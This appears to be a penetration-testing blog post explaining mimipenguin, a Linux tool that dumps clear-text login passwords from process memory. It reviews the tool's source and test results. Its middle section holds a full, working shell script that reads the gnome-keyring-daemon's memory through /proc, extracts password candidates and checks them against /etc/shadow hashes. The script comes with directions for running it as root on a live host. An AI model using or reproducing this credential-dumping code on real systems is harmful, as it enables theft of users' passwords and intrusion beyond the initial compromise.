Mimipenguin: Mimikatz for Linux


Introduction

Hello guys, recently a tool called "mimipenguin" was released. It is developed by @HunterGregal and allows you to dump clear-text passwords from a Linux machine, just as Mimikatz does on Windows.

If you want to know more about Mimikatz, see the official Mimikatz page at http://blog.gentilkiwi.com/mimikatz

As per the author, the tool supports the following operating systems and applications:

  • Kali 4.3.0 (rolling) x64 (gdm3)
  • Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
  • Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
  • XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
  • Archlinux x64 Gnome 3 (Gnome Keyring 3.20)
  • VSFTPd 3.0.3-8+b1 (Active FTP client connections)
  • Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions) [Gcore dependency]
  • openssh-server 1:7.3p1-1 (Active SSH connections – sudo usage)

Technical analysis

Let's have a look at the source code to better understand how the tool works. I have taken the Ubuntu code snippets.

Figure 1: Ubuntu source code snippets

[[ $(uname -a | awk '{print tolower($0)}') == *"ubuntu"* ]]

The above code lowercases the output of uname -a and checks whether it contains "ubuntu". If it does, the Ubuntu branch continues; otherwise the script exits.

$(ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk 'BEGIN {FS = " " } ; { print $1 }')

The above code checks whether a gnome-keyring-daemon process is running on the machine. If it is, the process ID is captured and step 3 reads that process's memory through /proc and starts dumping passwords in clear text (reading another process's memory this way requires root); otherwise the script exits.

Step 3 extracts the lines that have a high probability of containing clear-text passwords and then attempts to calculate each word's probability by checking it against the hashes in /etc/shadow, hashes found in memory, and regex searches. Below is the flow diagram for mimipenguin.

Figure 2: Mimipenguin working flow diagram
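The flow above, as an added shell example written for this article (it is not mimipenguin's own source): step 2 resolves the daemon's PID with ps and awk, and step 3 selects the writable mappings from a maps file, copies each one out of the memory image with dd, extracts the printable strings, and checks a candidate against a sha512crypt shadow hash. So that it runs offline, it builds a constructed maps file and memory image instead of opening /proc/<pid>/maps and /proc/<pid>/mem, uses a single constructed "password=" pattern where mimipenguin uses its own per-target regexes, and recomputes the shadow hash with openssl passwd -6 (reporting "unverified" when openssl cannot do that). All function names and the fixture contents are this example's own.

```shell
#!/bin/sh
# Added example for this article, not mimipenguin's own code. The same
# functions work on a live host when given /proc/<pid>/maps and
# /proc/<pid>/mem, which only root (CAP_SYS_PTRACE) can read.
LC_ALL=C
export LC_ALL

# Step 2: resolve a process name to its first PID (mimipenguin does this
# with ps | sed | awk). Prints nothing when the daemon is not running.
find_pid() {
  ps -eo pid,command 2>/dev/null |
    awk -v name="$1" 'index($0, name) && !index($0, "awk") { print $1; exit }'
}

# Step 3a: pick the mappings worth dumping. Only rw regions (heap, stack,
# anonymous buffers) hold live secrets; r-x text segments are skipped.
# /proc/<pid>/mem is addressed by virtual address, so the start address is
# used directly as dd's byte offset. Output: "start end" in decimal.
writable_regions() {  # $1 = maps file
  awk '$2 ~ /^rw/ { split($1, a, "-"); print a[1], a[2] }' "$1" |
    while read -r start end; do
      echo "$((0x$start)) $((0x$end))"
    done
}

# Step 3b: copy one region out of the memory image, byte by byte.
dump_region() {  # $1 = mem file, $2 = start offset, $3 = end offset
  dd if="$1" bs=1 skip="$2" count="$(( $3 - $2 ))" 2>/dev/null
}

# Step 3c: printable runs of 6+ characters, a portable stand-in for strings(1).
printable_strings() {
  tr -c '[:print:]' '\n' | grep -E '^.{6,}$'
}

# Step 3 end to end: every printable string from every writable region.
scrape() {  # $1 = maps file, $2 = mem file
  writable_regions "$1" | while read -r start end; do
    dump_region "$2" "$start" "$end"
  done | printable_strings | sort -u
}

# Step 3d: reduce the strings to candidate passwords. This one constructed
# "password=<value>" pattern stands in for mimipenguin's per-target regexes.
candidates() {
  sed -n 's/^password=//p'
}

# Final check: confirm a candidate against a $6$ (sha512crypt, default
# rounds) shadow field by recomputing the hash with the stored salt.
# Prints match, no, or unverified (openssl missing or without -6 support).
check_shadow() {  # $1 = candidate, $2 = hash field from /etc/shadow
  salt=$(printf '%s' "$2" | cut -d'$' -f3)
  computed=$(openssl passwd -6 -salt "$salt" "$1" 2>/dev/null) || { echo unverified; return 0; }
  if [ "$computed" = "$2" ]; then echo match; else echo no; fi
}

# Constructed fixture standing in for /proc/<pid>/{maps,mem}: a 16-byte
# "text segment" followed by a writable region that holds a secret.
# Prints the directory it created.
build_fixture() {
  dir=$(mktemp -d)
  printf 'HDR-TEXT-SEG\000\000\000\000' > "$dir/mem"
  printf 'uid=1000\000password=hunter2\000\000\000\000\000\000\000\000' >> "$dir/mem"
  cat > "$dir/maps" <<'EOF'
00000000-00000010 r-xp 00000000 08:01 1234  /usr/bin/gnome-keyring-daemon
00000010-00000040 rw-p 00000000 00:00 0     [heap]
EOF
  echo "$dir"
}

# Run the whole chain against the fixture; on a live host also report the
# real gnome-keyring-daemon PID so scrape can be pointed at it as root.
run_demo() {
  dir=$(build_fixture)
  # Constructed shadow field for the fixture's password; on a real target
  # this is the second field of the user's /etc/shadow line.
  shadow_hash=$(openssl passwd -6 -salt saltsalt hunter2 2>/dev/null) || shadow_hash='(openssl unavailable)'
  scrape "$dir/maps" "$dir/mem" | candidates | while read -r cand; do
    echo "candidate: $cand -> $(check_shadow "$cand" "$shadow_hash")"
  done
  rm -rf "$dir"
  pid=$(find_pid gnome-keyring-daemon)
  [ -n "$pid" ] && echo "gnome-keyring-daemon is pid $pid: as root, run scrape /proc/$pid/maps /proc/$pid/mem"
  return 0
}
run_demo
```

On a real host the only differences are the inputs: /proc/<pid>/maps and /proc/<pid>/mem for scrape, and the hash field from /etc/shadow for check_shadow, all of which need root. The writable-region filter is what keeps the dump small; dumping r-x segments only adds the binary's own strings.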

Dumping passwords

I have tested this tool on 32-bit (x86) and 64-bit (x64) operating systems. Run the script directly from a root terminal; no parameters need to be passed.

Below is the proof of concept:

Kali Linux x64 (supported)

Figure 3: Dumped clear-text password on a Kali Linux x64 system

Ubuntu x64 (supported)

Figure 4: Dumped clear-text password on an Ubuntu x64 system

32-bit (x86) systems are not supported; the result is blank

Figure 5: Blank result on an x86 system

Conclusion

The tool is very useful during the post-exploitation phase of a penetration test. Cracking the password hashes recovered from /etc/shadow is often impractical because of password complexity, whereas this tool reads the clear-text password straight out of process memory. Its feature set is limited to the listed targets, but within that scope it is a very powerful way to obtain clear-text passwords from Linux systems.

References

https://github.com/huntergregal/mimipenguin

Andrew Mallett, Mastering Linux Shell Scripting (Chapter 10: Awk Fundamentals), http://www.amazon.in/Mastering-Linux-Scripting-Andrew-Mallett/dp/1784396974

http://blog.gentilkiwi.com/mimikatz
